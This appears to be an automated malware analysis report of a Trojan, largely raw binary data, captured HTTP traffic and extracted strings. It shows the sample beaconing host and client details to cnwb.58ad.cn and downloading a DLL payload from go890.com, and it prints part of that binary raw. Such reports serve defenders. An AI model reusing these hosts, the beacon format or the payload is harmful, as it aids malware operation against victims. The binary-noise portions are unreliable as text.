...u_...c..^...cr6k.o~n..|..56w....}&..fC}.....G.........N..l.UP,v.....=*.....Y5..*v....gz..M.....c;6..M......q...(....r.bs....^.........?..v....]...g.7E.<.O@^S...../......:(,"..4........!n...l.....mV%I....^.<m.e...~.i..V}E!...d)N......."iz3..G.....?......di.;...ATy.>.....&...D./...H.v.....<4..6.<#......s.p]o.D.o._..?..L................:...G.....f..YR.G0.?..4.Gl..6...K$i)..b......"*.fo^.[.._.Z~...O...~.......1.].........v}P.....&....h7.7.....K........M:.r...>N....,....Y...?............vk.=.u..]W4..G..../.9N.>.......h.....6..].....o./.p...j.]r....o...e...G.ti.....&.|......5..E......#i..V.CPe.<...._.w.E...j..o[7M...*nn....7/...xW..1}...A.c}.3..=.........C.....n.....F..9-..O..b.a.....YT..........-...u.......]w......#!.n.......].!y...}...T......|.XT.....e..8......I....?<..S......]..!.....(.T.....6...K........7~.u..s..wG...~m...VlM...W..-&...M.D......L....PG.."Q......&.......u.....i.......}.. ..(...b..[S.5.'39Q....j3......~.....o?.7..h.G.....{.?....Y....|....2K........%..`.. .*...@/..pP.7..%UR...}..dXL#.5#Y.E...

<<< skipped >>>

GET / HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.ip138.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 02 Sep 2016 03:31:31 GMT

Content-Length: 18524

Content-Type: text/html

Content-Location: hXXp://VVV.ip138.com/index.htm

Last-Modified: Fri, 19 Aug 2016 02:18:00 GMT

Accept-Ranges: bytes

ETag: "864aa0e8bff9d11:4406"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 51315

X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)

Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<html>..<head>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312">..<meta name="mobile-agent"content="format=html5; url=hXXp://m.ip138.com/">..<title>IP........--.................. | ............ | ............ | ........................</title>..<meta name="Keywords" content="ip,IP....,IP........,ip138">..<meta name="Description" content="ip,IP....,IP........,ip138">..<script language="javascript">..<!--..if(window.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com/';..function checkIP()..{...var ipArray,ip,j;...ip = document.ipform.ip.value;...if (ip.indexOf(" ")>=0){3....ip = ip.replace(/ /g,"");....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("http://")==0){....ip = ip.slice(7);....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip = ip.slice(8);....document.ipform.ip.value = ip;...}...if (ip.slice(ip.length-1)=="/"){....ip = ip.slice(0,ip.length-1);....document.ipform.ip.value = ip;...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((ac)|(ad)|(ae)|(af)|(ag)|(ai)|(al)|(am)|(an)|(ao)|(aq)|(ar)|(as)|(asia)|(at)|(au)|(aw)|(az)|(ba)|(band)|(bb)|(bd)|(be)|(bf)|(bg)|(bh)|(bi)|(bid)|(biz)|(bj)|(bm)|(bn)|(bo)|(br)|(bs)|(bt)|(bv)|(bw)|(by)|(bz)|(ca)|(cc)|(cd)|(cf)|(cg)|(ch)|(ci)|(ck)|(cl)|(click)|(club)|(cm)|(cn)|(co)|(co\.in)|(co\.nz)|(co\.uk)|(com)|(com\.ag)|(com\.br)|(com\.bz)|(com\.cn)|(com\.c

<<< skipped >>>

POST /index/eventup.html HTTP/1.0

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 368

Cache-control: no-cache

Host: cnwb.58ad.cn

Accept: text/html, */*

User-Agent: Mozilla/3.0 (compatible; Indy Library)

event={"info":{"pid":1,"pip":"194.242.96.226","cid":"7F4E176E87AAF89EB8728D99FFA86566","cip":"192.168.11.131","type":2,"source":"EXE:2.0.0.30,DLL:2.0.1.7

","quantity":1,"time":1472820454,"code":"5636xanewong!Q@W#E"},"data":{"os":30,"game":0,"charge":0,"adv":0,"nodisk":0,"film":0,"culture":0,"police":0,"fire":0,"brower":0,"other":"EXE:2.0.0.30,DLL:2.0.1.7"}}

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Fri, 02 Sep 2016 17:46:55 GMT

Content-Type: text/html;charset=utf-8

Connection: close

Vary: Accept-Encoding

X-Powered-By: PHP/5.5.27

Set-Cookie: PHPSESSID=n8g9o4ccsvmpb5jvqbe7kelie6; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

1..

GET /d2/CDClient.dll HTTP/1.1

Host: VVV.go890.com

Accept: text/html, */*

User-Agent: Mozilla/3.0 (compatible; Indy Library)

HTTP/1.1 200 OK

Date: Fri, 02 Sep 2016 14:02:18 GMT

Server: kangle/2.9.6

Last-Modified: Fri, 02 Sep 2016 11:43:04 GMT

Content-Type: application/octet-stream

Content-Length: 825856

Age: 1

X-Via: 1.1 fuzhou183:2 (Cdn Cache Server V2.0), 1.1 db78:1 (Cdn Cache Server V2.0)

Connection: keep-alive

DUP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................f....................@.................................................................................................................................................................................................CODE.....p.......n......PEC2^O...... ....rsrc....0.......&...r.............. ....reloc..............................@.......................................................................................................................................................................................................................................................................................................................................................................................................................b.. .........c....X.........b..._.....J>b.d.I.....i5.R......-.X.,So.....Wp.eAbk......7i.....8x......j...o$.f....e.Xa...V....b.C.n...9H..TC.J-......].L .b|C.*{?..@...a..w..Q.s...."..\...3KO.w.....V.....^.#b.l......<.q.C<.......].6..t..E..s.oT.f0...vn.=.l.D.....6\@..Cg.B.._.I5O.......K...}.$....Gi..A>.L..j3..{..=.....Q.fG.{...?.A.G.q...Q............9..\..R.......O.....X}.F.....D.Z...4.[S$..T(C/.t.x.J6..F.?./?..\.7..i...;...L%Z.b.sC5....i.7`~h...S."._.b...fwp...V.......Z..!.}.iCG..V.. .;;....V&

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_1832:

.idata

.rdata

P.reloc

P.rsrc

.aspack

.adata

kernel32.dll

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

oleaut32.dll

EVariantBadIndexError

u%CNu

%s[%d]

getservbyport

WSAAsyncGetServByPort

WSAJoinLeaf

WS2_32.DLL

127.0.0.1

TIdSocketListWindows

TIdStackWindowsU

IdStackWindows

%s, %.2d %s %.4d %s %s

%s, %d %s %d %s %s

TIdEncoder3to4.Encode: Calculated length exceeded (expected

%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas

TIdEncoder3to4.Encode: Calculated length not met (expected

password

Password

IdHTTPHeaderInfo

ProxyPassword

ProxyPort

Mozilla/3.0 (compatible; Indy Library)

ftpTransfer

ftpReady

ftpAborted

ClientPortMin

ClientPortMax

Port

EIdCanNotBindPortInRange

EIdInvalidPortRangeSVW

libeay32.dll

ssleay32.dll

SSL_CTX_use_PrivateKey_file

SSL_CTX_use_certificate_file

SSL_get_peer_certificate

SSL_CTX_set_default_passwd_cb

SSL_CTX_set_default_passwd_cb_userdata

SSL_CTX_check_private_key

X509_STORE_CTX_get_current_cert

des_set_key

saUsernamePassword

Password

0.0.0.1

TIdTCPConnection

TIdTCPConnection|

IdTCPConnection

EIdTCPConnectionError

sslvrfFailIfNoPeerCert

TPasswordEvent

Certificate

RootCertFile

CertFile

KeyFile

OnGetPasswordP

EIdOSSLLoadingRootCertError

EIdOSSLLoadingCertError

EIdOSSLLoadingKeyError

TIdTCPClient

IdTCPClient

BoundPort

PortU

CommentURL

TIdHTTPMethod

IdHTTP

TIdHTTPOption

TIdHTTPOptions

TIdHTTPProtocolVersion

TIdHTTPOnRedirectEvent

TIdHTTPResponse

TIdHTTPRequest

TIdHTTPProtocolPIC

TIdCustomHTTP

TIdCustomHTTPPIC

TIdHTTP8KC

TIdHTTP

HTTPOptions

Port ;C

EIdHTTPProtocolException

application/x-www-form-urlencoded

HTTPS

https

This request method is supported in HTTP 1.1

HTTP/1.0 200 OK

HTTP/

%d.%d.%d.%d

;8=$:$:$;

KERNEL32.DLL

1.2.8

&tn

&unc

&vendor

&

&&

&

&Error

Summary

Dynamic Analysis

Removals

Static Analysis

Network Activity

Map

Strings from Dumps